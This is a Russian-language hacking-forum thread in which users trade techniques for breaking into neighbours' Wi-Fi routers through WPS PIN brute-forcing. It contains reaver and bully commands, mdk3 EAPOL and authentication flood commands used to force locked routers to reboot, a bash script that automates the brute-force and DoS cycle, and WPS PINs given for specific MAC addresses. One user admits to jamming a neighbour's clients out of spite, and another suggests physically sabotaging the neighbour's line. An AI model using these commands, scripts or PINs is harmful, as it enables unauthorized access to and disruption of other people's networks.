01.09.2014, 01:43
незнаю,что у вас там за точки вокруг слабые,я сейчас скрипт опробывал,в mdk3 время на минуту поставил,и ничего.....

та я на ночь mdk3 ставил,до десятка миллиона клиентов цеплял на точку(точки)и пофиг точкам У вас там просто такие точки,старые наверное,которые от 3 сек mdk3 сдуваются

UnitUnique
01.09.2014, 10:49
подскажите , что делать. нашел пароль (Inflator v 1.0 в нем - Reaver 1.4-r119) - по привычке нажал Ctrl-C, думал скопировать , окно естественно закрылось, но при повторном запуске (в нифляторе тут же нажал Run с теми же параметрами без перезапуска последнего) процесс продолжился с 91% и потом пошли пляски 99.99% один и один тот же пин перебирает и ошибки 25 successive start failures. Почему сессия так криво сохранилась ? Тут кто-то команду вроде выкладывал, что якобы должно показать сразу найденный ключ при повторном запуске, не могу найти...

p.s. добавил --pin xxxxxxxx, теперь опять пошло с 90% и проценты растут, но пин все тот же каждый раз вбивает (wps transaction failed, re-trying last pin), посмотрим, что будет...

SlNik
01.09.2014, 14:28
подскажите , что делать. нашел пароль (Inflator v 1.0 в нем - Reaver 1.4-r119) - по привычке нажал Ctrl-C, думал скопировать , окно естественно закрылось, но при повторном запуске (в нифляторе тут же нажал Run с теми же параметрами без перезапуска последнего) процесс продолжился с 91% и потом пошли пляски 99.99% один и один тот же пин перебирает и ошибки 25 successive start failures. Почему сессия так криво сохранилась ? Тут кто-то команду вроде выкладывал, что якобы должно показать сразу найденный ключ при повторном запуске, не могу найти...

p.s. добавил --pin xxxxxxxx, теперь опять пошло с 90% и проценты растут, но пин все тот же каждый раз вбивает (wps transaction failed, re-trying last pin), посмотрим, что будет...



Вот засада! Прийдется всё заново пересчитывать!

А если серьезно, то -p хххх. Вбивай первые ЧЕТЫРЕ цифры подобранного пина, а вторую часть прийдется пересчитать. Это займет не так уж много времени.

Такие глюки иногда встречаются. Первая часть уже подобрана верно.

СЕРЖ32
01.09.2014, 14:55
ну что,у кого ещё скрипт работает?(ривер и мдк3)?у меня то скрипт пашет,а толку увеличил уже в скрипте продолжительность работы мдк3,точкам всё равно,хоть миллиард клиентов вешай Незнаю.....видимо мдк3 действует на какие то древние точки,новым пофиг эти все атаки...

UnitUnique
01.09.2014, 19:14
Вот засада! Прийдется всё заново пересчитывать!

А если серьезно, то -p хххх. Вбивай первые ЧЕТЫРЕ цифры подобранного пина, а вторую часть прийдется пересчитать. Это займет не так уж много времени.

Такие глюки иногда встречаются. Первая часть уже подобрана верно.



спасибо, помогло, странно, что я так не попробовал, тут вроде не раз писалось...

СЕРЖ32
03.09.2014, 12:49
что то уже тема мёртвая ,видимо потому,что уже wps не актуален,уже у людей новые точки,где wps лочится навсегда,и никакой mdk3 не берёт,и ничего нового придумать не могут,что бы эти локи обойти.....

Вот тема и не развивается....

ivantaan
03.09.2014, 12:54
Друзья, есть новая уязвимость WPS у некоторых вендоров, она основана на низкой энтропии при генерации WPS кода на некоторых чипах BroadComm. (Грубо говоря, при каждой перезагрузке точки она генерирует один и тот же пин с большой вероятностью.) На августовской Black Hat 2014 конференции был продемонстрирован подбор WPS кода с 1-10 попыток на точках 2, пока мне неизвестных вендоров.

Вот презентация частично описывающия уязвимость:

http://www.engadget.com/2014/08/31/wifi-protected-setup-flaw/

У когото есть еще инфа?

СЕРЖ32
03.09.2014, 13:05
а вот такое смотрели?http://www.youtube.com/watch?v=hHVPSJn4Fqo

Какой то новый способ,вроде как mdk3,но другой какой то...

user100
03.09.2014, 13:42
а вот такое смотрели?http://www.youtube.com/watch?v=hHVPSJn4Fqo

Какой то новый способ,вроде как mdk3,но другой какой то...



В примере показана EAPOL FLOOD ATTACK на точку доступа,

парень включил ее с нескольких режимов monitor mode (mon1, mon2...)

Сама атака:

mdk3 mon0 x 0 -t ff:ff:ff:ff:ff:ff -n "Essid AP" - s 50000

-t - указываем BSSID Точки доступа

-n - указываем Названи Точки доступа (ESSID)

-s - указываем колличество EAPOL пакетов в секунду (в примере их 50000)

В конце видео показано, что точка перезагружается и wps lock снимается.

saimonyz
03.09.2014, 14:47
В примере показана EAPOL FLOOD ATTACK на точку доступа,

парень включил ее с нескольких режимов monitor mode (mon1, mon2...)

Сама атака:

mdk3 mon0 x 0 -t ff:ff:ff:ff:ff:ff -n "Essid AP" - s 50000

-t - указываем BSSID Точки доступа

-n - указываем Названи Точки доступа (ESSID)

-s - указываем колличество EAPOL пакетов в секунду (в примере их 50000)



вообще можно юзать ReVdK3-r1.sh

Видео

https://www.youtube.com/watch?v=zf93xJ7xD2k#t=74

Скачать

http://www32.zippyshare.com/v/12811261/file.html

Почитать

https://forums.kali.org/showthread.php?19498-MDK3-Secret-Destruction-Mode

Есть ещё FrankenScript 2 , Atrophy

chernec
03.09.2014, 16:03
У меня он не заработал и я его переделал:


#!/bin/bash
while true;
# Run reaver to work 10 pin
echo
echo
echo [+] reaver is working ...
do
reaver -i mon0 -b 10:FE:ED:5A:XX:XX -vv -L -g 10 -s /etc/reaver/10FEED5AXXXX.wpc;

# Run mdk3 to work 3s
echo
echo
echo [+] Mdk3 is working ...
gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX";
sleep 3;
killall mdk3 2> /dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C];
sleep 14;
done;

и меньше чем за сутки взломал эту сеть!

sleep 3 - это сколько секунд шарашит mdk3

sleep 14 - пауза до появления точки в эфире

-g 10 - сколько пинов перебирать

Точка от меня через перекрытие и я поставил подбор на 10 пинов но если при подборе были ошибки то reaver зависал и надо было нажать ctrl+c.

Скорость перебора reaver была 2 пина в секунду + пауза + работа mdk3 + поиск точки reaverom по каналам = 48 - 50 секунд на 10 пинов.



Подскажите, на какой ОС лучше запускать скрипт, на wifislax не получилось, опишите пожалуйста

TOX1C
03.09.2014, 16:10
Так а смысл такой атаки,что собственно натравливается на точку,что лок снимается?



Смысл в том, что роутер должен не справиться с наплывом желающих присосаться и отправиться в ребут. Тема та же, что и с навешиванием левых клиентов на точку, только работает иначе.



на какой ОС лучше запускать скрипт



На кали линукс заработало, но как бы без разницы, на чем его запускать, срабатывает он крайне редко.

СЕРЖ32
03.09.2014, 16:18
Смысл в том, что роутер должен не справиться с наплывом желающих присосаться и отправиться в ребут. Тема та же, что и с навешиванием левых клиентов на точку, только работает иначе.

На кали линукс заработало, но как бы без разницы, на чем его запускать, срабатывает он крайне редко.



Что то подсказывает,что современным роутерам,с новыми прошивками,такая атака тоже до одного места,как и mdk3 классический ,не будут они ребутится....

Та да....скрипт то включается.работает.только толку 0,ну или только если натравливать на старые роутеры,а так просто работает скрипт и всё,хоть на сутки включай работу mdk3

4pips
03.09.2014, 18:08
Подскажите, на какой ОС лучше запускать скрипт, на wifislax не получилось, опишите пожалуйста



В том сообщении (http://forum.antichat.ru/showpost.php?p=3760910&postcount=2082) первый скрипт для wifislax, а второй для Kali. Идея одна, но на разных ядрах реализация разная.

saimonyz
03.09.2014, 18:45
В том сообщении (http://forum.antichat.ru/showpost.php?p=3760910&postcount=2082) первый скрипт для wifislax, а второй для Kali. Идея одна, но на разных ядрах реализация разная.



там где /etc/reaver/6466B3ACXXXX.wpc нужно через редактор править на другую точку что мне надо просто не пойму как пользоваться этим скриптом

VladimirV
03.09.2014, 20:43
там где /etc/reaver/6466B3ACXXXX.wpc нужно через редактор править на другую точку что мне надо просто не пойму как пользоваться этим скриптом



Да, в редакторе правим все BSSID на тот который ломаем.

Если лок сбрасывается, а точка канал не меняет паузу поле mdk3 ремим (#) или ставим 1.

asdm
05.09.2014, 19:43
подбираю пин все для того же нетгира с помощью bully,ночью поставил нетбук,утром смотрю и окно в котором подбирался пин было закрыто,думаю может я случайно на крестик нажал или еще что...заново запустил bully и он начал подбирать и...это долбаное окно опять через сутки закрылось....причем если тогда мне оставалось перебрать 5000 пинов,то после того как окно закрылось и я начал перебирать bully прошлую сессию восстанавливает,но только почему вместо 5000 пинов мне осталось перебрать 7000....

на флешке xiopan

asdm
06.09.2014, 15:21
в твоем случае тебе нужно добавить параметр -r 9:120 - ривер каждые 9 пинов будет делать паузу в 2 минуты, по идее точка быстрее забывает про предыдущие неудачные попытки чем разлачивается. Время, которое ривер будет ждать подбирай опытным путем, можешь сократить, а может прийдется и увеличить.



это со всеми роутерами работает? например с 00:0e:8f,которые после 10 пинов лочатся на полгода?

J()KER
06.09.2014, 21:27
это со всеми роутерами работает? например с 00:0e:8f,которые после 10 пинов лочатся на полгода?



команда работает со всеми, а вот какой промежуток времени нужен, нужно подбирать опытным путем, я бы начал с 10 минут, если точка будет лочиться и после 10 минут простоя, то ломать ее нет смысла, если нет, сократил бы интервал, пока не нашел минимальный.

Еще можно вдобавок попробовать менять mac между попытками, если будет работать, можно написать скрипт для автоматизации.

asdm
06.09.2014, 21:56
можно вдобавок попробовать менять mac между попытками



как это сделать?

вроде -r 9:120 с netgearом прокатывает,если раньше точка лочилась на 215 сек,то теперь такого 120 секундного простоя достаточно

попытался так сделать с 00:0e:8f (sercomm rv6688),мгтсный который,но там все не так просто....по идее эта модель дает перебрать 10 пинов и потом уходит в лок на неопределенный срок...я задал ключ -r 7:180,reaver перебрал 7 пинов,потом остановился на 3 минуты и...все-лок...даже оставшиеся 3 пина не были протестированы,странно очень...очень сложно проводить какие-то эксперименты с подобными точками,это же не 2х минутный лок....и получается,что в случае лока мне нужно заставить хозяина ее перезагрузить,а это тоже проблематично (сидят не все время или вообще не пользуется (хотя,даже если и пользуются,не все додумаются),поэтому mdk3 бесполезен),про "ждать" вообще молчу,ибо лок тут на очень долгий срок,возможно даже до перезагрузки

хорошо тем, кто является обладателем таких устройств...к "таким устройством" помимо это rv6688,относится еще и билайновский smartbox,может кто пробовал их ломать?

J()KER
06.09.2014, 23:37
как это сделать?

вроде -r 9:120 с netgearом прокатывает,если раньше точка лочилась на 215 сек,то теперь такого 120 секундного простоя достаточно

попытался так сделать с 00:0e:8f (sercomm rv6688),мгтсный который,но там все не так просто....по идее эта модель дает перебрать 10 пинов и потом уходит в лок на неопределенный срок...я задал ключ -r 7:180,reaver перебрал 7 пинов,потом остановился на 3 минуты и...все-лок...даже оставшиеся 3 пина не были протестированы,странно очень...очень сложно проводить какие-то эксперименты с подобными точками,это же не 2х минутный лок....и получается,что в случае лока мне нужно заставить хозяина ее перезагрузить,а это тоже проблематично (сидят не все время или вообще не пользуется (хотя,даже если и пользуются,не все додумаются),поэтому mdk3 бесполезен),про "ждать" вообще молчу,ибо лок тут на очень долгий срок,возможно даже до перезагрузки

хорошо тем, кто является обладателем таких устройств...к "таким устройством" помимо это rv6688,относится еще и билайновский smartbox,может кто пробовал их ломать?



Если знал что точка проблемная нужно было задать 5 пинов и таймаут минут в 10, если бы прокатило, сокращал бы по минуте

asdm
10.09.2014, 20:25
reaver -i mon0 -d 0 -b XX:XX:XX:XX:XX:XX -a -vv -S -n -N -r 9:220 -L -c #

# - номер канала жертвы



не помогло,все заступарилось на 90,90,как тогда...правда -N пришлось удалить так как reaver 1.3 не поддерживает этот ключ,

СЕРЖ32
19.09.2014, 17:08
народ,кто пробовал прогу Atrophy?эта прога вроде для попытки задосить точку так,что бы или перезагрузилась или хозяин перезагрузил...

я её попробовал,неплоъая прога,короче при включении её натравливает на точку все опции mdk3,т.е на точку столько всего сыпеться,что пипец!тп линки у меня перезагружались,лок впс снимался,но перебор сразу не идёт сразу,точки видимо в себя приходят

кто такую прогу тестил,как она вам?что есть на подобие,что бы точки перезагружать?

Romualdos2
22.09.2014, 22:54
народ,кто пробовал прогу Atrophy?эта прога вроде для попытки задосить точку так,что бы или перезагрузилась или хозяин перезагрузил...

я её попробовал,неплоъая прога,короче при включении её натравливает на точку все опции mdk3,т.е на точку столько всего сыпеться,что пипец!тп линки у меня перезагружались,лок впс снимался,но перебор сразу не идёт сразу,точки видимо в себя приходят

кто такую прогу тестил,как она вам?что есть на подобие,что бы точки перезагружать?



Чего это за прога такая Atrophy? Под Kali или Backtrack 5r3 запускается?

Romualdos2
27.09.2014, 13:17
Проверил Atrophy на своем Keenetik 4G. "Вешает" его мгновенно.Соседская точка не сдается

Может кто подскает по мак адресу производителя соседского девайса 28:28:5D:96:48:A0.

TOX1C
27.09.2014, 13:52
28:28:5D



Это тоже zyxel.

Romualdos2
27.09.2014, 14:20
Это тоже zyxel.



Спасибо. Залочился собака. Уже не знаю чего придумать.

asdm
28.09.2014, 21:58
атакую точку одну (а точнее ее клиентов) с помощью mdk3 mon0 g -t mac,перед этим нужно вдобавок запускать airodump-ng с указанием канала...и все бы хорошо,но точка иногда менять канал (уж не знаю,сама она это делает или хозяева меняют) и тут возникает проблема....в airodumpe указан один канал,а точку переместилась на другой и поэтому mdk3 прекращает бомбежку,можно конечно вручную поменять канал,но делать это постоянно не очень хочется,да и не всегда возможно.....поэтому вопрос:можно ли сделать так,чтобы airodump-ng самостоятельно менял канал,в зависимости от того на котором находится точка? заранее спасибо

Vikhedgehog
28.09.2014, 22:05
атакую точку одну (а точнее ее клиентов) с помощью mdk3 mon0 g -t mac,перед этим нужно вдобавок запускать airodump-ng с указанием канала...и все бы хорошо,но точка иногда менять канал (уж не знаю,сама она это делает или хозяева меняют) и тут возникает проблема....в airodumpe указан один канал,а точку переместилась на другой и поэтому mdk3 прекращает бомбежку,можно конечно вручную поменять канал,но делать это постоянно не очень хочется,да и не всегда возможно.....поэтому вопрос:можно ли сделать так,чтобы airodump-ng самостоятельно менял канал,в зависимости от того на котором находится точка? заранее спасибо



Можно воспользоваться ривером с опцией -L, при потери связи он будет искать новый канал с точкой.

asdm
28.09.2014, 23:06
Можно воспользоваться ривером с опцией -L, при потери связи он будет искать новый канал с точкой.



ну я как бы не подбираю пин....просто хочу задолбать хозяина и вынудить его сменить роутер

Vikhedgehog
28.09.2014, 23:18
Зачем людям портить жизнь?

asdm
28.09.2014, 23:20
Зачем людям портить жизнь?


если бы ты моих соседей знал,то таких вопросов не задавал

Vikhedgehog
28.09.2014, 23:24
Хахах ну ок) Можно же все равно попробовать запустить ривер, просто не обращать внимания на то, что он там пишет, главное же чтоб канал менял когда надо. Наверное есть более умные способы или скрипты, но о таких я ничего не знаю.

comporg
29.09.2014, 13:55
Хахах ну ок) Можно же все равно попробовать запустить ривер, просто не обращать внимания на то, что он там пишет, главное же чтоб канал менял когда надо. Наверное есть более умные способы или скрипты, но о таких я ничего не знаю.



Можна вместо Ривера использовать BULLY.

Указываешь ESSID или BSSID, а канал bully сам найдёт...

TOX1C
29.09.2014, 18:35
просто хочу задолбать хозяина и вынудить его сменить роутер



Так бы сразу и сказал. Берешь удлинитель, ненужный шнур с вилкой, ищешь инет кабель хозяина, врезаешься в него электрошнуром, а дальше бах и готово. Главное при этом не спалиться, а то отпердолят так, что мама родная не узнает.

asdm
02.10.2014, 20:20
Хахах ну ок) Можно же все равно попробовать запустить ривер, просто не обращать внимания на то, что он там пишет, главное же чтоб канал менял когда надо.



да,спасибо,вроде помогло

paulo
06.10.2014, 18:46
Доброго времени суток!

Вопрос такого характера, вот reaver перебирает сначала "популярные", затем по-порядку. Как это делает bully? И можно ли выставлять свой алгоритм перебора пинов? Например 0001,9999,0002,9998, или по арифметической прогрессии?

Обычно использую reaver,но чет точка не реагирует на него, попробовала bully, но в оболочке python, роутер asus, ломаю я его уже... кмк с первого октября, только 43%. Примерно 30, +-3 пина в час. Сначала давал три пина, сейчас один или два, когда как, лочится на минуту ( тоже приблизительно), потом снова 1-2 пина.

Суть вопроса в том, что я не вижу какой пин проходит, вижу только общее количество (4760), поэтому интересует алгоритм.

Понимаю, что процесс может не увенчаться успехом, но бросать не хочу, все-таки 43%!)))

Опять же, где он сохраняет файл-не знаю. Чтоб потом, если что запустить в терминале bully с того момента, где остановился. И если что прописать не могу, потому как пина не знаю ( не вижу).

Помогите, если кто сталкивался))

Ну и паровозом... Вот есть адаптер alfa, tplink и тд, а никто ничего не слышал про эти?

Это то же самое или я чет путаю?

http://ru.aliexpress.com/item/high-power-2000MW-Wifi-USB-Adapter-Alfa-Awus036nh-Wifi-Wireless-USB-Adapter-with-5dbi-anenna/1548657719.html

http://ru.aliexpress.com/item/150Mbps-150M-Wireless-USB-WiFi-Wi-Fi-Wi-Fi-Adapter-With-External-Antenna-Wholesale-Free-Drop/1463345800.html

chingizbel
06.10.2014, 22:02
Чем пользуетесь ?

В кали пишется ваши пины **** или ******** к примеру:

reaver -i mon0 -b MAC -vv -L -p ****

Вконце когда он подберёт правильный пин к точке, то всё выведится в этом же консоле , правильный пин, пароль и сколько ушло время в секунд.

P.S bully не пользовался

Альфа не оригинал там чип 3070

VladimirV
06.10.2014, 22:02
to paulo

попробуйте поискать файл с именем похожим на BSSID без : !

paulo
06.10.2014, 23:09
Чем пользуетесь ?

В кали пишется ваши пины **** или ******** к примеру:

reaver -i mon0 -b MAC -vv -L -p ****

Вконце когда он подберёт правильный пин к точке, то всё выведится в этом же консоле , правильный пин, пароль и сколько ушло время в секунд.

P.S bully не пользовался




Хм... Пользуюсь wifislax. И это не ривер, это булли))) зачем Вы мне рассказываете, как должно быть в ривере?)))))) , если P.S. Если не пользовались булли!

И не когда, а ЕСЛИ он подберет правильный пин)))) это я все знаю, как должно выглядеть и в какой консолИ



Альфа не оригинал там чип 3070



И как мне понять, что Вы хотели сказать по поводу адаптеров, которые не альфа???? Повторюсь, вопрос был -можно ли их использовать как альтернативу Альфе, потому как думаю, что удобнее, компактнее-как минимум!!!



попробуйте поискать файл с именем похожим на BSSID без : !



Где? Где искать?) Я знаю, в какой папке сохраняет reaver... Может...В той же папке, только под названием python...?) надо попробовать.

SlNik
06.10.2014, 23:24
Хм... Пользуюсь wifislax. , это булли)))

Где? Где искать?) .



/root/.bully/macaddress.run

Директория .bully будет скрытая (Hidden), поэтому искать ее нужно с опцией Show hidden files.

Чтобы продолжить с того места, где остановился в прошлый раз, нужно сохранить этот лог-файл

из оперативной памяти на какой-нибудь носитель и при следующей загрузке подставить обратно

или указывать bully путь к нему (параметр -w).

Vikhedgehog
06.10.2014, 23:26
Доброго времени суток!

Вопрос такого характера, вот reaver перебирает сначала "популярные", затем по-порядку. Как это делает bully? И можно ли выставлять свой алгоритм перебора пинов? Например 0001,9999,0002,9998, или по арифметической прогрессии?

Обычно использую reaver,но чет точка не реагирует на него, попробовала bully, но в оболочке python, роутер asus, ломаю я его уже... кмк с первого октября, только 43%. Примерно 30, +-3 пина в час. Сначала давал три пина, сейчас один или два, когда как, лочится на минуту ( тоже приблизительно), потом снова 1-2 пина.

Суть вопроса в том, что я не вижу какой пин проходит, вижу только общее количество (4760), поэтому интересует алгоритм.

Понимаю, что процесс может не увенчаться успехом, но бросать не хочу, все-таки 43%!)))

Опять же, где он сохраняет файл-не знаю. Чтоб потом, если что запустить в терминале bully с того момента, где остановился. И если что прописать не могу, потому как пина не знаю ( не вижу).

Помогите, если кто сталкивался))

Ну и паровозом... Вот есть адаптер alfa, tplink и тд, а никто ничего не слышал про эти?

Это то же самое или я чет путаю?

http://ru.aliexpress.com/item/high-power-2000MW-Wifi-USB-Adapter-Alfa-Awus036nh-Wifi-Wireless-USB-Adapter-with-5dbi-anenna/1548657719.html

http://ru.aliexpress.com/item/150Mbps-150M-Wireless-USB-WiFi-Wi-Fi-Wi-Fi-Adapter-With-External-Antenna-Wholesale-Free-Drop/1463345800.html



Че за асус не знаете? В ривере что происходит, лок или просто подвисает на запросе identity? Просто если б bully хоть как-то работал на всяких там RT-N66U которые чуть что лочатся, было бы офигенно.

СЕРЖ32
07.10.2014, 01:11
Чем пользуетесь ?

В кали пишется ваши пины **** или ******** к примеру:

reaver -i mon0 -b MAC -vv -L -p ****

Вконце когда он подберёт правильный пин к точке, то всё выведится в этом же консоле , правильный пин, пароль и сколько ушло время в секунд.

P.S bully не пользовался

Альфа не оригинал там чип 3070



это почему не оригинал это просто альфа со стандартом N,там такой чип(awus036nh)

comporg
07.10.2014, 18:38
Доброго времени суток!

Вопрос такого характера, вот reaver перебирает сначала "популярные", затем по-порядку. Как это делает bully? И можно ли выставлять свой алгоритм перебора пинов? Например 0001,9999,0002,9998, или по арифметической прогрессии?



В Ривере ▬ можна выставлять как ты выразилась, свой алгоритм...

А в Булли ▬ не получится, по дефолту Булли перебирает пины в разброс, но если ты добавишь опцию -S будет идти перебор попорядку...

paulo
07.10.2014, 21:23
В Ривере ▬ можна выставлять как ты выразилась, свой алгоритм...

А в Булли ▬ не получится, по дефолту Булли перебирает пины в разброс, но если ты добавишь опцию -S будет идти перебор попорядку...



Как? Подскажите пожалуйста, как можно это сделать в ривере????!!!!

elepol61
07.10.2014, 21:58
Как? Подскажите пожалуйста, как можно это сделать в ривере????!!!!



мда уж...проще некуда...сто раз уже обсуждалось

http://forum.antichat.ru/showpost.php?p=3643330&postcount=1403

henri2002
07.10.2014, 21:58
Как? Подскажите пожалуйста, как можно это сделать в ривере????!!!!




что сделать?

ривер итак перебирает по порядку.

asdm
07.10.2014, 22:19
пытаюсь узнать по какому принципу генерятся пины для netgearов новых (в частности jnr3210)

нашел образец http://fcenter.ru/product/goods/113410 (но одном из скриншотов видны mac и pin)

так вот:

последние 6 символов mac адреса:3c8460

pin:33610429

,если перевести 3c8460 из hex в dec получим 3966048....

мне нужен pin для 3bcc3e,опять таки переведя в dec получим 3918910,тогда pin (если,конечно,все так как я думаю) должен быть таким 331?91?? только не понятно,что поставить вместо (?)...может кто разберется? так то реально существующий пин (33610429) похож на то,что получается после перевода 6 последних символов maca в dec (3966048),то есть связь какая-то есть

вот еще одну картинку нашел http://fast.ulmart.ru/p/big/41/4147/414746_3.jpg

paulo
07.10.2014, 22:30
мда уж...проще некуда...сто раз уже обсуждалось

http://forum.antichat.ru/showpost.php?p=3643330&postcount=1403



Прям уж сто раз! Не просто это разыскивать в 214 страницах форума!

Спасибо!

henri2002
08.10.2014, 01:06
пытаюсь узнать по какому принципу генерятся пины для netgearов новых (в частности jnr3210)

нашел образец http://fcenter.ru/product/goods/113410 (но одном из скриншотов видны mac и pin)

так вот:

последние 6 символов mac адреса:3c8460

pin:33610429

,если перевести 3c8460 из hex в dec получим 3966048....

мне нужен pin для 3bcc3e,опять таки переведя в dec получим 3918910,тогда pin (если,конечно,все так как я думаю) должен быть таким 331?91?? только не понятно,что поставить вместо (?)...может кто разберется? так то реально существующий пин (33610429) похож на то,что получается после перевода 6 последних символов maca в dec (3966048),то есть связь какая-то есть

вот еще одну картинку нашел http://fast.ulmart.ru/p/big/41/4147/414746_3.jpg



попробуйте

33139052

asdm
08.10.2014, 01:26
попробуйте

33139052



спасибо за помощь,но этот пин не подходит

tr1ckyBiT
08.10.2014, 05:01
...,тогда pin (если,конечно,все так как я думаю) должен быть таким 331?91?? только не понятно,что поставить вместо (?)...



Че там думать, если подход правильный то там 10 вариантов для первой половины пина, и 10 для второй. Задай риверу стартовую позицию 3310 и смотри за перебором, если переберет до 3319 и пойдет дальше, значит идея не верна, а если перешагнет на вторую половину, значит угадал.

P.S.

Интересные пассы ставит Netgear на эти точки. Трехсложные общей длиной в 14 символов. Но что характерно, первая двухсложная фраза состоит из двух английских слов, прилагательного и существительного суммарной длиной 11 символов в нижнем регистре, вероятней всего выбирающихся псевдослучайно из двух словарей, а в трехзначном числе по центру стоит цифра, совпадающая с первой цифрой в имени точки, а боковые равны между собой. В плане брута такие точки должны быть попроще чем те где стоят хоть и 8 значные но псевдослучайные пароли.

smala
08.10.2014, 18:27
Доброго времени суток. Помогите пожалйста сломать точку dlink dir 615. Проблема в том что reaver пробует один и тот же пароль, а ничего не получаетса(((. Читал пост где давали список маков і пини к ним, нашел свой мак, но пин не подходт(. Есть еще нибуть какоето решение етой проблеми?(

paulo
10.10.2014, 11:31
Че за асус не знаете? В ривере что происходит, лок или просто подвисает на запросе identity? Просто если б bully хоть как-то работал на всяких там RT-N66U которые чуть что лочатся, было бы офигенно.



ASUS RT-N12C1

ривер просто перебирал три пина, затем обязательно 10 с ошибкой, то есть один и тот же 10 раз, и потом снова три. Сломался через три дня, потому как лока как такового не происходило, просто эти ошибки и все. Да и пин был не в самом конце перебора. Так бы ушло чуть больше.

Mucambary
10.10.2014, 19:12
Доброго времени суток. Помогите пожалйста сломать точку dlink dir 615. Проблема в том что reaver пробует один и тот же пароль, а ничего не получаетса(((. Читал пост где давали список маков і пини к ним, нашел свой мак, но пин не подходт(. Есть еще нибуть какоето решение етой проблеми?(



Можно словить хендшейк и попробовать прогнать по словарям

asdm
15.10.2014, 22:16
не подскажите пин от этого кинетика?

mac: c8:6c:87:3b:53:d7

Payer
15.10.2014, 22:28
не подскажите пин от этого кинетика?

mac: c8:6c:87:3b:53:d7



Пробуйте 3888087х

kievpol
20.10.2014, 11:17
подскажите как в reaver настроить что бы пин ишол с 39000000!!!

Mucambary
20.10.2014, 11:42
подскажите как в reaver настроить что бы пин ишол с 39000000!!!



reaver -i mon0 -b BSSID -vv -p 39000000

kievpol
20.10.2014, 12:29
reaver -i mon0 -b BSSID -vv -p 39000000


пишет постоянно 39000003! но процент перебора идёт!

binarymaster
20.10.2014, 15:32
Правильнее...

reaver -i mon0 -b BSSID -vv -p 3900

morbus
21.10.2014, 20:48
Точка локнута уже в течение суток, я прямо удивился, правильно ли понимаю что спасет скорее всего только перезагрузка? TP-link

chingizbel
21.10.2014, 20:54
Точка локнута уже в течение суток, я прямо удивился, правильно ли понимаю что спасет скорее всего только перезагрузка? TP-link



Да, перезагрузка.

Посмотри позже, завтра может разлочится.

Точно сам не знаю как там с TP-linkом

morbus
21.10.2014, 21:10
Ага, а чем лучше ддосить тп линк? пробовал mdk3, как то 0 эмоций

Пятро
24.10.2014, 00:02
Ребят подскажите, есть 2 точки

DIR-320NRU и Zyxel

Как их можно ломануть, в деталях пожалуйста!!)

TOX1C
24.10.2014, 00:37
Для взлома через впс нужно скачать какой нибудь дистрибутив линукса, типа airslax или kali linux, из под него запустить reaver, и ждать. К твоему зукселю пароль скорее всего будет 65648247. Насчет последней цифры не уверен. Хотя ее в ривер вводить необязательно. К тому эе зюкселю можно попробовать подключиться с помощью мобилы на андроиде, или через программу драйвера вайфай карты (jumpstart, tp-link qss, ralink - в зависимости от производителя). Обычно у них есть функция подключения к точке через пин код

С длинком сложнее - пароль необходимо подбирать.

binarymaster
24.10.2014, 01:38
К твоему зукселю пароль скорее всего будет 65648247. Насчет последней цифры не уверен.



Последняя цифра верная. Только вот это не пароль, а WPS пин код.

Пятро
24.10.2014, 02:33
Разобрался!)Спасибо огромное друзья

KIs1LLER
25.10.2014, 06:23
mac: 50:46:5D:5F:A6:57

ривер забуксовал на одном пине 99985677

Что подскажите дальше делать? Спасибо

binarymaster
25.10.2014, 15:52
9998**** это последний пин в списке.

Это означает, что пин не найден. Либо reaver пропустил его, либо точка не позволила (такое с ASUS-ами старыми бывает).

Попробуйте перебор сначала, только задайте задержку побольше. Либо попробуйте bully.

KIs1LLER
25.10.2014, 16:19
9998**** это последний пин в списке.

Это означает, что пин не найден. Либо reaver пропустил его, либо точка не позволила (такое с ASUS-ами старыми бывает).

Попробуйте перебор сначала, только задайте задержку побольше. Либо попробуйте bully.



Кароче перебирал я его несколько дней вот етой штукой ReVdK3-r1.sh.

А может посоветуете с какого пина начать? а то я хочу задать пин -p 9997 он мне сразу с последнего (999985677) и буксует.

Что делать?

binarymaster
25.10.2014, 16:28
а то я хочу задать пин -p 9997



А зачем?



он мне сразу с последнего (999985677) и буксует.



Не удивительно, 9997 это ж предпоследний в списке. Не подходит значит.



Что делать?



Я уже писал в предыдущем посте.

henri2002
25.10.2014, 19:18
9998**** это последний пин в списке.

Это означает, что пин не найден. Либо reaver пропустил его, либо точка не позволила (такое с ASUS-ами старыми бывает).

Попробуйте перебор сначала, только задайте задержку побольше. Либо попробуйте bully.



есть такое дело, что ривер пропускает в асусе, также пропускает в эдимаксе, гояскрипт вскрыл такие точки.

asdm
26.10.2014, 00:01
гояскрипт вскрыл такие точки.



это еще что?

ohoo
26.10.2014, 00:26
это еще что?



http://forum.antichat.ru/showpost.php?p=3636762&postcount=114

KIs1LLER
26.10.2014, 02:17
Еще есть точки:

A0:F3:C1:XX:XX:XX(2шт)

EC:43:F6:XX:XX:XX

F4:EC:38:XX:XX:XX

binarymaster
26.10.2014, 02:49
EC:43:F6:XX:XX:XX



Вот к этой я бы подсказал пин код, но нужен мак полностью.

KIs1LLER
26.10.2014, 02:55
bully перебрал несколько пинов и остановился time limiting...

KIs1LLER
26.10.2014, 02:55
Вот к этой я бы подсказал пин код, но нужен мак полностью.



EС:43:F6:02:57:58

binarymaster
26.10.2014, 02:59
EС:43:F6:02:57:58



Попробуй 01534320.

morbus
26.10.2014, 04:25
Спешу поделится информацией для форумчан что живут в РБ. Наши местные модемы промсвязь, которые выдает байфлай, в настройках самого модема не дают изменить wps вручную(проверено на версии прошивки 2.5), то бишь либо можно отключить, либо пин код останется прежним. в моем случае пин код был 12345670.

p.s. промсвязь это ZTE

Payer
26.10.2014, 16:49
подскажите как заставить reaver продолжать например с 56% ?



Подредактируйте файл сессии, замените там 0 на 5000, например.

Для редактирования запустите процесс заново и через время остановите.

В файле ххххххххх.wpc первая и вторая строка - с какого номера начинать перебор первой и второй части пина.

chingizbel
26.10.2014, 18:01
Может кто подскажет пин, а то лочится на сутки и более, mdk3 не помагает.

ROSTELECOM_6A0B

68:15:90:4E:6A:0C

Заранее спасибо!

elepol61
26.10.2014, 20:15
Может кто подскажет пин, а то лочится на сутки и более, mdk3 не помагает.

ROSTELECOM_6A0B

68:15:90:4E:6A:0C

Заранее спасибо!



попробуй 51389567

chingizbel
29.10.2014, 13:37
попробуй 51389567



Жаль не подошёл (

asdm
02.11.2014, 19:26
несколько паролей к sercomm rv6688 (сети вида MGTS_GPON_xxxx,где xxxx-набор цифр)

